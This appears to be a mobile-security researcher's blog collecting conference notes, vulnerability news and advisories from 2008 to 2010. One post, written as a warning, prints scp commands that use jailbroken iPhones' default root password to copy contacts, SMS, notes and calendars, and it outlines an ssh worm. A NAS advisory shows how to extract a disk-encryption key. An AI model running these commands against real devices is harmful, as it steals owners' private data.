...stuff I do and things I like...

Two stories I want to comment on:

FatSkunk software-based attestation as a solution to mobile malware. Article by the German Technology Review. They promise a lot. I don't think this will work as advertised (I haven't seen this at work - also I can't really find a paper about it).

Smartphone Weather App Builds A Mobile Botnet. So these guys created a classic trojan application (does something very simple and useful but has a malicious part too). Of course people will download the application from some trusted website - nothing to wonder about.

Just found another mobile security talk that will be held at CanSecWest: Stuff we don't want on our Phones: On mobile spyware and PUPs - Jimmy Shah, McAfee, Inc


Update March 9th:

I forgot the Hack-in-the-Box conference in April in Dubai. They have two mobile security related talks: Base Jumping: Attacking GSM Base Stations and Mobile Phone Basebands by the Grugq and Open Sesame: Examining Android Code with undx2 by Marc Schoenefeld.

Just links...

Gartner Says Worldwide Mobile Phone Sales to End Users Grew 8 Per Cent in Fourth Quarter 2009; Market Remained Flat in 2009 so you know what OS/platform you want to PWN this year :-)

NeoPwn = BackTrack Mobile NeoPwn Merges with BackTrack. Produces BT Mobile for #N900 it seems that WiFi driver for the nokia N900 (wl1251) was patched for RFMON and injection.

Android link collection mostly OS and security stuff

...thats it!

Yea I will be going to CanSecWest for the first time this year. I'll have a talk on my favorite subject: Mobile Phone Security (Random tales from a mobile phone hacker). I'm really looking forward to this!

Second, there will be a mobile phone PWN2OWN again this year. They increased the cash pool for mobile devices to $60K, this looks like a statement! The devices/platforms are: iPhone (of course), BlackBerry, S60 (Nokia), Android.

SecurStar did it again in 2006 there was RexSpy and in 2010 we have this mobile phone crypto comparison. But the knowledgeable community is big enough to identify and point out this kind of advertising/scam fast enough.

Conferences, the only interesting talk I found is: iPhone Privacy by Nicolas Seriot at Black Hat DC this week.

In other news, I still need a Nexus One. It is still not available to buy out side of the US. *ARG*

Updated (Feb 2nd):

Something from a few days ago: iPhone PKI handling flaws

I have been busy as hell from mid December to now, this was due to the Chaos Communication Congress (26C3), the fact that I turned 30, and some work stuff. I guess I have missed some interesting stuff in this time. So once again if you have interesting things on mobile security tell me!

Conferences, ShmooCon taks place in February (I always wanted to go - still haven't made it). The New World of Smartphone Security - What Your iPhone Disclosed About You by Trevor Hawthorn. Karsten is doing his GSM: srsly talk again. Bluetooth Keyboards: Who Owns Your Keystrokes? by Michael Ossmann, for some time I did a lot with Bluetooth keyboards so I would really like to see what they show here - especially since Michael Ossmann is one of the guys who really knows about Bluetooth. honeyM: A Framework For Virtual Mobile Device Honeyclients by whole bunch of Military guys (SCNR). Blackberry Mobile Spyware - The Monkey Steals the Berries by Tyler Shields. So it really looks like ShmooCon has some mobile security content this year.

Random news:

Android Phishing app in the Market

Study of BlackBerry Proof-of-Concept Malicious Applications

Fun find:

Abhoersichers Handy (Anti eavesdropping Mobile Phone) apparently this should cost 4800 Euros. The screen shots look interesting. If anyone has any details on this device please tell me.

very short update...

SRI published an analysis of Ikee.B here: www.csl.sri.com/users/porras/iPhone-Bot.

I wrote about this stuff about a year ago here ;-)

so I was quite busy with various projects therefore this update is really really late.

The most interesting thing that happened recently was the jailbroken iPhone SSH fuck up. See: 1 and 2. There are many other stories on this all over the net, also by now this is kind of old. The interesting thing actually is that I investigated this jailbroken iPhone SSH problem in August of this year. Including a nice statistic and some measurement. I'm planning to show this stuff together with some other work at some conference (academic and hacker) next year (talks/papers are submitted).

Conferences, I attended DeepSec in mid November, this was great fun. Including some good mobile phone security talks. At the upcoming 26C3 there will also be a bunch of talks on mobile phone security. Location tracking does scale up, GSM: SRSLY?, Playing with the GSM RF Interface, Using OpenBSC for fuzzing of GSM handsets, and SCCP hacking, attacking the SS7 & SIGTRAN applications one step further and mapping the phone system.

I actually planed to not attend 26C3 because last year kind of sucked, especially because there were way too many people. So this year I will go to some talks but not hangout at the conference. If you want to hangout during CCC give me a call or write me an email. Although my talk on SMS fuzzing was rejected I recently was asked if I would do it if they find a spot in the schedule. Of course, I would do it.

Recent papers: iPhonePrivacy.pdf shows some privacy issue with the iPhone platform. Nothing really surprising, but a good read.

I know I missed several things in this post but I kind of have info overkill in the last weeks. Please send me hints hints hints!!!

Conferences: PacSec 2009 Charlie Miller is giving a talk on iPhone SMS Fuzzing and Exploitation, Rich Cannings & Alex Stamos are giving titled The Android Security Story: Challenges and Solutions for Secure Open Systems, and Yves Younan is giving a talk on Filter Resistant Code Injection on ARM (this sounds interesting). So PacSec seems to be filled with some good mobile security related talks.


Btw. the CanSecWest CfP is open now. I have something to submit but it will be complicated because of some academic conference. Let's see what happens.

Bug watch:

Some more PalmPre: Floating Point thingy in the browser seems to make a nice DoS.

Links:

Dangers of Customized Android ROMS and Malware
Internet per UMTS: So fälschen deutsche Provider Webinhalte (German)

the guys from the Mobile Security Lab seem to have a lot of time recently a couple of days ago they released a short study on SSL on mobile phones: Tricks for Defeating SSL: effectiveness test on mobile phones.

Tomorrow (7th of October) Hack-in-the-Box 2009 takes place in Malaysia for some reason I always forget HITB. I can't remember ever reading a CFP or anything. They seem to have a few mobile security related talks. Here is the Agenda. Bugs and Kisses: Spying on BlackBerry Users for Fun by Sheran Gunasekera, Side Channel Analysis on Embedded Systems by Job De Haas.

Bug watch:
Palm Pre WebOS <=1.1 Remote File Access Vulnerability The short description is: The Palm Pre WebOS <=1.1 suffers from a JavaScript injection attack that allows a malicious attacker to access any file on the mobile device. Things get more and more interesting with web stuff on smartphones.


On October 9th the CFP ends for:
26C3: Here Be Dragons (26th Chaos Communication Congress)
December 27th to 30th, 2009 in Berlin, Germany

They always like mobile phone related talks, so go and submit something interesting.

Lets start with conferences again. I'll be speaking at the 5th Annual Mobile Device Management and Security Forum this is a more high level non-technical conference, haven't been to stuff like this so it should be interesting. Another speaking event will be at the TelekomForum - Mobilfunktrends 2010 in Bonn, lets see how this goes.

Michael Mueller of silentservices.de found some nice SMS/MMS/Wap Push bugs in various smart phones. The bugs allow to spoof/obfuscate the sender address/number of MMS messages. This could be used for spam or social engineering I guess. The advisories are here and here.

The guys from the Mobile Security Lab published a primer on Service Load (SL) attacks. I haven't had time to read it yet. You can find it: here

So stuff happens in the mobile security world.

SEC-T was a nice event, I had a good time. The location was nice, the talks were good and I talked to some interesting people.

Some highlights: a reverse engineering challenge, a Wifi antenna building contest, and a bar quiz (a nerdy one). The best part, the team I was on won the quiz *G*

Bonus. I had the chance to play with a Nokia N900 (the Nokia Linux smart phone). This is a sweet device.

Vorsicht - ansteckend! (in German) something about mobile phone malware, this was even printed *G*

Researchers discuss iPhone, SMS bug Interview done by NetworkWorld at Black Hat this year.

I rather should be doing slides but I don't want to right now.

Upcoming conferences:

#T2 in Helsinki October 29-30 will have a two talks first Forensics on GSM phones by David Batanero and second Spying via Bluetooth by Jamo Niemela. Especially the talk on phone forensics would be very interesting for me since lately the subject was brought to my attention by multiple people. David Batanero was also scheduled to talk at SEC-T in September but his talk was cancelled, too bad since I'm going to SEC-T but not #T2. As far as I can see my talk is the only mobile security talk at SEC-T this year.

DeepSec in Vienna on November 19-20 will have two mobile security talks. First Hijacking Mobile Data Connections 2.0: Automated and Improved by Roberto Piccirillo and Roberto Gassir (Mobile Security Lab) and second A practical DOS attack to the GSM network by Dieter Spaar.

Btw. I'll actually attend DeepSec this year. I'm looking forward to it since it will be my first time at DeepSec, and Vienna is a fun city.

Other interesting developments:

The various GSM cracking projects seem to be taking off this time around. The people behind AirProbe and Creating A5/1 Rainbow Tables seem to really want to build something that is easy usable. I really wait for the day this stuff is done and anybody with a old GSM phone has to be worried that someone with hardware for about 100 Euros can listen to his/her phone calls and can read his/her text messages (SMS).

I recently I had a fun idea for this idea I want/need a list of hardware that has a build-in mobile phone or GSM modem. If you know of such hardware please tell me (collin[AT]mulliner.org or comment on this post). Please don't tell me about laptop/netbook X with a build in modem but rather about your fridge or microwave that can call or text. So this is a call for hardware with embedded mobile phones!

this blog post is long overdue, but due to traveling and catching up on work this had to wait.

Black Hat USA had quite a few mobile security related talks, the slides are here: Exploratory Android Surgery by Jesse Burns (haven't read this yet), Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone by Vincenzo Iozzo and Charlie Miller. Attacking SMS by Zane Lackey and Luis Miras, Is Your Phone Pwned? Auditing, Attacking and Defending Mobile Devices (only the white paper - no slides so far) by Kevin Mahaffey and Anthony Lineberry and John Hering. The stuff for our talk Fuzzing the Phone in your Phone by Charlie Miller and myself is here.

It was nice to see that Zane and Luis took my MMS research and followed some ideas I had and made them work. Especially the part about running a your own MMSC (MMS Server). At the point in time where I tested this it did not work because the WAP-gateway that is configured in the MMS profile only connects to the MMSC of the mobile operator. I tested this with multiple US providers and some German providers in 2005/2006. I guess I have to do some testing here in Germany to see if anything changed for our local operators.

HAR2009 had a few interesting talks too. In no particular order: Cracking A5 GSM encryption by Karsten Nohl, Public transport SMS ticket hacking by Pavol Luptak, OpenBSC - running your own GSM network by Harald Welte (the slides are the same as the 25C3 slides), Airprobe - Monitoring GSM traffic with USRP by Harald Welte (could not find any slides, somebody took notes and put them here).

Did anything else happen in August? I think there was something but I can't remember. Hints welcome!

It looks like I'm going to speak at SEC-T in Stockholm (Sweden). I'll talk about the SMS Security Research I've done together with Charlie Miller.

I'm really looking forward to go to Stockholm since I love both Sweden and Stockholm!

currently I'm hanging out at USENIX Security in Montreal. Talks are quite good and Montreal is a nice city to visit.

I just found out that our paper Injecting SMS Messages into Smart Phones for Security Analysis is already available for download. I also uploaded my slides for the talk. It is available on my SMS Security Research page.

I just created the SMS security research page in order to publish the slides from our (Charlie and myself) talk at Black Hat USA 2009 titled: Fuzzing the Phone in your Phone.

The injection frameworks for the iPhone, for Android, and for Windows Mobile are available for download just now. Charlie provided his Sulley fuzzing test cases. The page is far from complete as we have more tools and scripts to share. But since I'm on vacation/business trip (depending on the actual day) I didn't find time to sort it all out.

I also updated my iPhone Security page with the link to Apple's security advisory for the vulnerability we reported. iPhone OS 3.0.1 fixes this vulnerability.

SexyView a Symbian Virus/Worm or bot(net)? I really don't care too much about viruses, so until this thing has a real control channel and can auto-update it is nothing. The one thing that I find interesting about it is the fact that it seems to be signed. This more or less proofs that signatures don't buy you any security. One can always somehow obtain a signature for a piece of malware. This is as good as having no signatures at all - well not exactly it still puts the bar a little higher.

The Windows Mobile HTC OBEX path traversal bug is interesting. Not because it is new but rather that this kind of bug made it once again into a device. So I guess no quality control at HTC. Alberto, the guy who found and reported the bug, told me that HTC was not really interested in communicating with him. This is sad since HTC will also be building their own Android devices soon. I just read that HTC seems to offer a hotfix for the issue.

On a personal note. As I wrote before I'll be going to Black Hat and Defcon in Vegas. Directly after Vegas I'll travel to the Valley (Los Altos and Mountain View). Before going to Montreal for USENIX I will spend some time around Santa Barbara. So if anybody is up for some mobile phone security stuff contact me.

Otherwise see you in VEGAS!

Bernhard Mueller from SEC Consult posted this fine work on Symbian security to the full disclosure list. His white paper Pwning Symbian looks interesting (I haven't actually read it completely yet).

I guess it is time again for a news update. I actually wanted to write one for June but I somehow forgot.

Let's start with the most recent stuff. Charlie Miller partially disclosed what we are going to talk about at Black Hat at the end of the month. Sadly some reporter over hyped his story. This sucked btw! Here are the original (over hyped) and the actual facts stories.

The HAR2009 program is out and there will be some mobile phone security related talks. Public transport SMS ticket hacking seems to talk about how to hack a SMS-based ticketing systems. cracking a5 gsm encryption will do a state of the art talk. There will also be a OpenBSC talk that will show how to build and run a GSM network based on opensource software an hardware everybody can buy. All in all HAR seems to be quite some fun. Sadly I wont be able to go due to time conflicts.

Fun find on BugTraq: Multiple Flaws in Huawei D100. The Huawei D100 is a small home 3G router (product page) that seems to be given out by some ISPs.

A personal side note: I now own/have-full-access-to a BS-11 Abis GSM base station and will soon start to play around with it. Happy happy fun fun.

I've been waiting for quite some time to publish the full details of the iPhone Safari Phone-auto-Dial vulnerability. But since Apple included it again in the just published security fixes for iPhone OS 3.0 I decided to finally go ahead and publish the details. The examples in the advisory show only the original bug also we found some variations of it, we didn't put any examples in the advisory.

iPhone Safari Phone Auto-dial Vulnerability also see my iPhone page.

I'm also credited, together with many others, for reporting the issue that Mail loads remote images when displaying HTML emails. The problem is actually a little bit bigger since also iframes are loaded. I actually showed them a demo where I can start QuickTime from Mail without user interaction. Do I need to say more?

The second advisory is about the Nokia 6212 classic an Near Field Communication mobile phone. I did a full disclosure of the bugs at 25C3 in late December 2008 but I never published an actual advisory. I do this now.

Nokia 6212 Classic URI Spoofing and DoS vulnerabilities also see my NFC page.

First of all conferences. EUSecWest is taking place the coming week in London. It will feature multiple mobile security related presentations. First Charlie Miller and Vincent Iozzo each have a iPhone related talk. Second Petr Matousek will speak about rootkits on Windows Mobile/Embedded and third Ralf-Philipp Weinmann will talk about DECT decryption. Looks like EUSecWest will be an interesting place to be this coming week.

Right after EUSecWest PH-Neutral is taking place in Berlin where I will be showing of a small side project on mobile phones and web usage. Many other interesting talks will be held as usual.

Black Hat USA started to announce the speaker lineup for this year and yes I'm one of the speakers. Together with Charlie Miller we will talk about SMS Fuzzing. So far Black Hat seems to become very strong on mobile phone security this year. Jesse Burns will talk about Android, Zane Lackey and Luis Miras will also have a talk on SMS but from the description they took a different angle than Charlie and myself. John Hering from Flexilis also seems to have gotten accepted with a mobile phone related talk that sounds very interesting Is your phone pwned? Auditing, attacking, and defending mobile devices. Last but not least Charlie Miller and Vincent Iozzo will do an iPhone talk. I actually hope for more mobile phone related talks, lets wait and see.

The Nokia 1100 story is getting more and more annoying. In this article it is reported that this company called Ultrascan replicated the SMS interception. No technical details of course. So now I'm looking for people who are interested in the topic and who would also like to understand this and possibly replicate it.

See you at PH-Neutral this weekend!

Update:

So it seems Google/HTC pushes Android security updates without publishing a change log. WTF?!? Any rumors about what this is about?

just a quickie, the slides from BlackHat Europe are up for a few days. Here are the slides for Hijacking Mobile Data Connections and for Passports Reloaded Goes Mobile (clone a RFID passport using an NFC mobile phone). So far Charlie Miller and Vincenzo Iozzo only put up a whitepaper of their OS X and iPhone talk.

If you can understand German (spoken word) you might want to listen to Chaosradio Express episode 120 which is about OpenBSC and generally about building GSM networks or actually the software to run a network in your cellar/garage.

In the last week there was a short buzz about a old Nokia phone (Nokia 1100) that could be reprogrammed to sniff SMS messages. The story really sounds like a hoax since the whole subscriber ID stuff is handled through the SIM card rather then through the phone itself. There are not many details just the story. F-Secure has something in their blog about this too.

Yesterday the new Android version cupcake was released for developer phones, get your cupcake while its still warm :-) Get it from here.

Btw the Technology Review article citing me is only in the next issue (06.2009).

BlackHat Europe brought some new stuff:

First the guys from the Mobile Security Lab showed us that the OMA provisioning functionality can be easily abused to reconfigure the Internet connection settings on many mobile phones. Although the attack requires some user interaction and therefore some social engineering the attack is quite cool. Technology Review has an article on their work. Nice Work guys!

The second mobile device related piece from BlackHat Europe is that Charlie Miller showed a workaround for the non-executable memory of the iPhone. I haven't see the slides of his talk but NetworkWorld has an article on Charlie's iPhone find.

I was interviewed by the German version of Technology Review on the subject of smart phone security and malware. As far as I know the article citing me should be in the current issue (05.2009).

Otherwise not much happened in the world of mobile device security.

few things happened besides Pwn2Own. One thing I missed about the mobile pwn2own is that Sergio Alvarez apparently tried to own a BlackBerry device but failed due to device/software mismatch. Hey at least he seems to have a exploitable bug for BlackBerry, nice!

Since today the slides for CanSecWest are online. The mobile security stuff is here: 1 2 3 4

At the upcoming BlackHat Europe some guys from the Mobile Security Lab will give a talk on Hijacking Mobile Data Connections . This sounds interesting too bad I can't go.

Feedback is welcome, any good sources to recommend? Any mailing lists?

so it looks like Pwn2Own mobile failed the first time it was around. This is a surprise for me.

Pwn2Own is over, all mobile devices remain unscathed. #cansecwest (via Twitter)

I would have guessed that the iPhone would be have been taken even it's Non-Exec-Memory since many more people try to break it in comparison with the other mobile platforms.

Symbian was the only mobile platform somebody tried to pwn?

#cansecwest we've got someone trying the Symbian phone now- stand bye (via Twitter)

This is a bigger surprise to me. Especially since Pwn2Own only offers a Nokia N95, a device that has Non-Exec memory. I tried to closely follow Pwn2Own mobile so when I first saw that Symbian was in the game I thought this will be uninteresting since they will take a brand new device with Non-Exec memory. When I read about the Nokia E61 in this announcement I was really happy since this device doesn't have Non-Exec memory. In the latest announcement the E61 seems to have been removed. Possible because the figured out that it was way to old, bummer.

I actually predicted that somebody will own the Windows Mobile device and the Android G1 but they all survived. Maybe all the bugs were already reported to the manufacturers before mobile pwn2own was announced so they could not be cashed (I at least know about one case). So I guess people will hold on to their (mobile) bugs until next year's CanSecWest/Pwn2Own. Especially now that some well known people called for their no more free bugs campaign. One last point that I found nice was that for mobile pwn2own the goal was not necessary code execution but 1) loss of information (user data) OR 2) incur financial cost. My iPhone phone call bug would probably have counted, so I guess I should also keep bugs for myself now.

SIMKO2 is the new super secure smart phone for German government officials. According to heise.de the device is based on HTC touch pro and runs a hardened version of Windows Mobile. The device and all it's communication with the outside is going to be encrypted using a micro-sd smartcard (see here). Also the SIMKO2 devices seem far from being deployed since they seem to have some performance issues with the encryption, see here, also heise.de reports that the SIMKO2 devices are faster then the original touch pro. If you can read german you should check out these three links: 1 2 3.

Sexy View is the first signed Symbian worm (makes it the first effective worm for S60 3rd edition). The worm spreads through simple social engineering, it sends a SMS to every contact in the contact list of an infected phone. The SMS simply contains a URL to the worm's SIS file on the internet. What I find interesting is the payload of the worm, since it doesn't seem to send any premium rate SMS or MMS but collects information about the phone (IMEI) and the SIM card (probably IMSI and MSISDN). This makes me wonder what these information are being used for or maybe used for in the future. Fortinet thinks that the worm could be the first step of a mobile botnet, also there is no proof yet that the worm contains any update or remote control mechanism. This could be a really interesting thing in the near future.

The mobile bug of the week is a XSS attack against a HSDPA router using SMS, see here. Like most routers the Huawei E960 is controlled via a web interface. The interesting feature of the E960 seems to be that it displays un-escaped SMS messages in the web interface and therefore can be exploited through SMS messages containing HTML and JavaScript. The attack is really funny, also I think it is quite impractical since the victim would need to load the router configuration page in his web browser in order to trigger the attack. Never the less this is a great attack!

This year's CanSecWest will have a good amount of smart phone security related talks besides the earlier announced mobile pwn2own contest. Talks seem to be focused on the iPhone and the Android platform. 1) Alfredo Ortega and Nico Economou - Multiplatform Iphone/Android Shellcode, and other smart phone insecurities 2) Jon Oberheide - A Look at a Modern Mobile Security Model: Google's Android and 3) Sergio 'shadown' Alvarez - The Smart-Phones Nightmare. I suppose Sergio Alvarez is also going to talk about the iPhone since Apple fixed multiple bugs that he submitted in the iPhone 2.2 update. I'm a bit sad that I can't attend CanSecWest.

At BlackHat Europe Jeroen van Beek will show his NFC-phone-based e-Passport cloning tools. Maybe there is even more mobile security stuff going on there since the speaker list is not yet complete.

Done with conferences for this post. The guys from the Mobile Security Lab just launched their poc site where people can test their phones using exploits developed by the mobile security lab. Nice idea!

Last weekend at ShmooCon Charlie Miller released details on a vulnerability in Android's audio player. Some links: 1 2

Related news: Palm has finally killed PalmOS. I really waited a long time for this to happen. PalmOS was just way past its time. This a good and sad thing but now its over.

Did I miss anything?

I just read that CanSecWest's Pwn2Own is going mobile this year. It looks like they are going to have an iPhone, a Android (should be a G1), a Symbian, and a Windows Mobile device too pwn and own. I wonder how the rules are going to be for these devices. via twitter

Second part. There seems to be the first mobile phone banking micro payment trojan out in the wild according to Kaspersky Labs. The trojan targets a micro payment service that allows transfer of money and minutes between users of the service using SMS. Another interesting part of the story is that the trojan is just a modified version of an existing premium SMS trojan. Stories: 1 2.

I've just uploaded the latest version of my NFC/NDEF tools. This is the version that I presented at my talk at 25C3. I mainly added some parsers for the new NDEF records supported by the Nokia 6212 Classic. Also included are some bug fixes and a small fix to talk to the BtNfcAdapter running on the Nokia 6212. I further included some more attack samples and an updated version of my ndef_mifare reader/writer tool.

At 25C3 I had the chance to take a look at Motorola's L7 NFC phone that is used by Deutsche Bahn Touch and Travel. The phone is not a real NFC phone, Motorola just replaced the battery lid with a lid that also contains the NFC hardware (or maybe only the antenna). The only NFC functionality the phone supports is the Touch and Travel application. What is really bad is that the user first needs to start the application and then hold the phone up to the Touch Point. WTF? How is this going to be a good user experience? The Nokia phones constantly scan for NFC tags and start the appropriate application as soon as one holds the phone up to a tag.

Finally I have noticed that RMV ConTags are starting to appear all over the place out side Frankfurt/Main. Also they only seem to be placed at big stations like the Darmstadt main station (Hauptbahnhof) but not inside the city. As always I like to know about interesting new NFC services around Europe and especially Germany.

here is another nice Windows Mobile (HTC) security bug that is related to WAP push. The vulnerability can be triggered by sending vCards to port 9204/UDP over either WiFi or GPRS/UMTS. The effect seems to be significant device slow down and/or device freezing that requires battery removal. This again reminds me of my good all MMS Notification DoS attack.

The bug was discovered by the Mobile Security Lab (who ever this is). I hope we will see more interesting discoveries from them, they just seem to have setup their site in October.

first, I known I'm not the first one to write/warn about this so don't flame me for it.

I recently jailbroken my iPhone so I could take a closer look at the iPhone and it's OS. As most people I just used the PwnageTool from the iPhone Dev-Team. It is easy, fast and just works. So what most people forget is that the jailbroken iPhone OS comes with an ssh server and that the root and mobile users have their password set to alpine (mobile password is dottie). This basically means that everybody can log into every jailbroken iPhone as user root. When I jailbroke my iPhone I didn't change my password right away since I was too busy playing with the new features and I strongly believe that many other people never changed the password of their jailbroken iPhone.

Again the danger lies in public Wifi hotspots or any other situation where you share Wifi with people you don't know. A good example is the upcoming Chaos Communication Congress which has one of the most hostile (wireless) networks I know.

So what can happen if you leave your iPhone's password unchanged? That is what I cooked up the last few nights.

The Basics:

• Anyone can log into your iPhone as user root and/or mobile
• Anyone can copy files to and from your iPhone using scp

In further detail this means all your private data is gone, just like this:

SSH_PARAMS="-q -o NumberOfPasswordPrompts=1 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no"
scp $SSH_PARAMS root@$IP:/var/mobile/Library/AddressBook/* /tmp/yourdata/
scp $SSH_PARAMS root@$IP:/var/mobile/Library/SMS/* /tmp/yourdata/
scp $SSH_PARAMS root@$IP:/var/mobile/Library/Notes/* /tmp/yourdata/
scp $SSH_PARAMS root@$IP:/var/mobile/Library/Calendar/* /tmp/yourdata/

The code shown above simply copies your Addressbook, SMS, Notes, and Calendar from your iPhone using scp (secure copy - part of ssh). I know there is much more to steal like: photos, email, or vpn configuration. This attack is so simple everybody can do it without any special knowledge or tools.

Getting your personal data stolen can happen to you anywhere but there is another threat that is more likely at events like the Chaos Communication Congress, defcon, and any other conference with a high number of jailbroken iPhones: a worm.

A worm that simply spreads using ssh/scp and the default root/mobile password can be written in bash (which is installed on all jailbroken iPhones) in about 4 hours. The worm just (tries to) copies itself (a bash script) to every host on the local wifi network in the background. Background tasks can be easily setup using launchd. Just add a new task that runs the worm shell script every couple of minutes. This is no big deal for anyone with just basic understanding of ssh,scp,bash, and launchd/launchctl. I was able to do this in an evening mainly using Google to get the appropriate launchd plist syntax.

Don't get me wrong, I don't want to encourage anyone to do all this. I just show you how damn easy this is. So please change your root/mobile password on your jailbroken iPhone - or somebody else will do it for you.

Btw. if you are looking for the images that the iPhone takes about anything you do some of these are located here: /var/mobile/Library/Caches/Snapshots (of course this is not new either see here).

today I submitted the camera ready version of my paper Vulnerability Analysis and Attacks on NFC-enabled Mobile Phones to the Workshop on Sensor Security at ARES 2009. Finally a academic publication again. Done this now I'm official on Christmas vacation until 25C3.

Today we published a small security bug present in the iPhone OS until version 2.1. The bug is small but has big impact in the way that it can be used to call arbitrary phone numbers from visiting a website.

More details including a video (but not full-disclosure) can be found here (German only): www.sit.fraunhofer.de/pressedownloads/pressemitteilungen/iPhoneHack.jsp

We will do a full-disclosure as soon as the update is out and people had time to install it. Details will be available here.

NIST just released their Guidelines on Cell Phone and PDA Security here are some comments from my side.

Overall I think the document is quite good covering the field well. My main point of critic is the way they present their references. The document cites many news sites instead of the original publisher's site/document. Therefore some of the references are more or less useless since they don't provide the path to more detailed information. I not only write this because they quote theregister on my MMS vulnerability but also because of quoting zdnet on various other vulnerabilities rather than the original advisories. To make it clear I don't think the articles by these news sites are bad or wrong, I just think people reading NIST publications expect a little more detail.

This post in the XDA-Developers forum shows that Windows Mobile 6 on HTC devices is vulnerable to malicious WAP Push SI (Service Indication) and SL (Service Load) messages. An attacker can send a message containing a URL to an executable, the executable will be automatically downloaded and executed WITHOUT any user interaction. The problem is that HTC disabled the security settings for these kinds of WAPPush messages, normally a device should only accept these kinds of messages from trusted originators (e.g. your service provider - don't know if I want this either).

The fix to this problem is very easy as it just requires modification of a few keys in the mobile phones registry (yes Windows Mobile has a registry). (The steps to do this modification is described in the original advisory.)

The bug is kind of similar to one of the MMS-based bugs I discovered 2 years ago where the Windows Mobile devices would accept WAPPush messages over UDP (WiFi).

This WAPPush auto execute configuration bug is really bad since it would allow anybody to write a very simple worm that only needs to send WAPPush messages (SMSs) to spread. The victim device than downloads and executes the worm binary from the Internet.

They even made a demo video, also you don't see too much.

Some open questions from my side:

• Is it really only HTC devices?
• Is it only Windows Mobile 6?
• Does this work via WiFi (like my notiflood tool)?

Slientservices.de Author's website
The Advisory

Here are my slides for my BlackHat Japan talk Exploiting Symbian. This work was done as part of my research at Fraunhofer SIT. If you have any questions please contact me through my website at Fraunhofer SIT.

I just setup pptpd for my iPhone. Since I don't really trust all the application developers to think about my passwords and my privacy.

I know PPTP is not the best VPN solution but it works and was easy to setup.

@Joe du auch wolle?

Alex recently got a Mifare (RFID) ID spoofing device. Last weekend at the MRMCD111b we got to play with it. I'm looking forward to try it against some real targets.

so looks like I'm going to BlackHat Japan in October to talk about my latest project SymbianOS Exploitation. I'm really looking forward to it since I never been to Japan and BlackHat before.

BlackHat Japan speakers page

I finally came to post the official advisory Nokia 6131 NFC URI Spoofing and DoS Advisory to the usual mailing lists in order for this thing to get into the vulnerability archives.

slides for for BlackHat and DefCon 2008 are already available online.

Get them here and here

here are my NFC security tools this time for your Nokia 6131 NFC. The tool set consists out of: BtNfcAdapter (a simple NDEF reader/writer that is controllable via Bluetooth - basically turns your 6131 NFC into a lightweight tag reader/writer), BtNfcAdapterRaw (Mifare Classic raw reading version of BtNfcAdapter), and MfStt (the Mifare Sector Trailer tool, a very basic tag security checker).

All the tools are for educational purposes only! They are not stable! Especially take care when using the writing features of MfStt).

Feedback is welcome as always. I also accept dumps of cool NFC tags (only including a picture of that very tag).

I just uploaded the first version of my Python NDEF library.The library supports all types standardized by the NFC-Forum until now. I also implemented support for Nokia's Bluetooth Imaging tag and added a parser for the RMV ConTag.

I also uploaded some tag samples (dumps of the tag data). The dumps also include the Mifare sector trailers (if this is of interest for you).

Feedback is very welcome!

here are the slides for my talk Attacking NFC Mobile Phones that I gave at EUSecWest2008. The tools, libraries, examples and data dumps will be uploaded soon.

looks like I've been selected to give a talk at EUSecWest this year. The subject will be the security of NFC (Near Field Communication) mobile phones.

My friend Alech also seems to have a talk there. This should be some fun.

another bug I found in the software of the NAS-4220-B is that you can use telnet to login to the NAS-4220-B as root without being ask for as password. This is possible right after boot of the device. The problem seems to originate from the fact that the software puts together the filesystem in ram during boot. The actual bug is that telnetd is started before /etc/passwd is populated with a root account that has a password set.

[1] raidsonic nas4220 disk crypt key leak

Found while playing with my NAS-4220-B last Sunday. RaidSonic didn't answer my emails so here you go.

--- BEGIN ADVISORY ---

Manufacturer: RaidSonic (www.raidsonic.de)
Device:       NAS-4220-B
Firmware:     2.6.0-n(2007-10-11)
Device Type:  end user grade NAS box
OS:           Linux 2.6.15
Architecture: ARM 
Designed by:  Storm Semiconductor Inc (www.storlinksemi.com)


Problem: 
 Hard disk encryption key stored in plain on unencrypted partition.


Time line:
 Found: 09. March 2008
 Reported: 09. March 2008
 Disclosed: 16. March 2008 


Summary:
 The NAS-4220-B offers disk encryption through it's web interface. The key
 used for encrypting the disk(s) is stored on a unencrypted partition.
 Therefore one can extract the encryption key by removing the disk from
 the NAS and reading the value from the unencrypted partition. The key
 itself is stored in a file in plain (base64 encoded). Therefore the 
 NAS-4220 crypt disk support can not be considered secure.


Details:
 The NAS-4220-B can hold two SATA disks. Disk are encrypted through a 
 loop back device using AES128. The problem came to my attention when
 I could access the NAS after reboot without suppling the hard disk key.
 
 The key is stored in /system/.crypt, "/system" is a small configuration 
 partition on the same disk that holds the encrypted partition. The system
 partition is created by the system software running on the NAS-4220. The
 configuration partition of the second hard disk is not mounted by default
 but also contains the .crypt file holding the key for the encrypted 
 partition on the same disk.


 Accessing the key (key value is the example I used):
  $ cat /system/.crypt
  MTIzNDU2Nzg5MDEyMzQ1Njc4OTA=
 
  key in plain           key in base64
  12345678901234567890   MTIzNDU2Nzg5MDEyMzQ1Njc4OTA=


 Base64 decode:
  #!/usr/bin/python
  from base64 import *
  print b64decode("MTIzNDU2Nzg5MDEyMzQ1Njc4OTA=")


Reported by:
 Collin Mulliner 

--- END ADVISORY ---

raidsonic_nas4220_crypt_disk_key_leak_09Mar2008.txt

Some guys from Princeton found a way to defeat disk encryption systems by extracting the key from the memory of a computer/laptop. While this is not really new (other people did that before), their way is quite cool. They remove the RAM module from the computer and read it in a other computer in order to do this without loosing the content of the RAM module they freeze the RAM module and with freeze they really mean freeze.

Check out the demo video.



Their paper explains it in all details. Read it if you use disk encryption and feel safe.

[1] Cold Boot Attacks on Encryption Keys (paper, video, faq, ...)

Somebody or some group seems to have found a exploitable buffer overflow in the iPhone's baseband processor. The baseband processor is the subsystem of the phone that talks to the GSM network. The overflow seems to be in the SIM Toolkit manager.

The exploit lets one upload code into the baseband, so one could insert some application into your iPhones baseband. The this application would be mostly undetectable since the memory can not be read from the application processor.

Lets see what happens with this little thing...

Source:

From: steve 
To: gsm@lists.segfault.net
Subject: [gsm] JerrySIM -> Executing shellcode on the iPhone baseband

Hi,

JerrySIM leaked yesterday. It was posted here:
http://code.google.com/p/iphone-elite/wiki/JerrySim

The exploit code has been removed shortly after but google cached it
already :/ It's out.

The program exploits a bug in the SIM Toolkit manager (which is running
on the baseband) and thus enables the execution of shellcode directly
on the baseband.

This is good work.

This has the potential to turn the iPhone into a listening device.
It still requires a lot of work and I do not know if any of the iPhone
hackers is working on it. 

regards,

steve

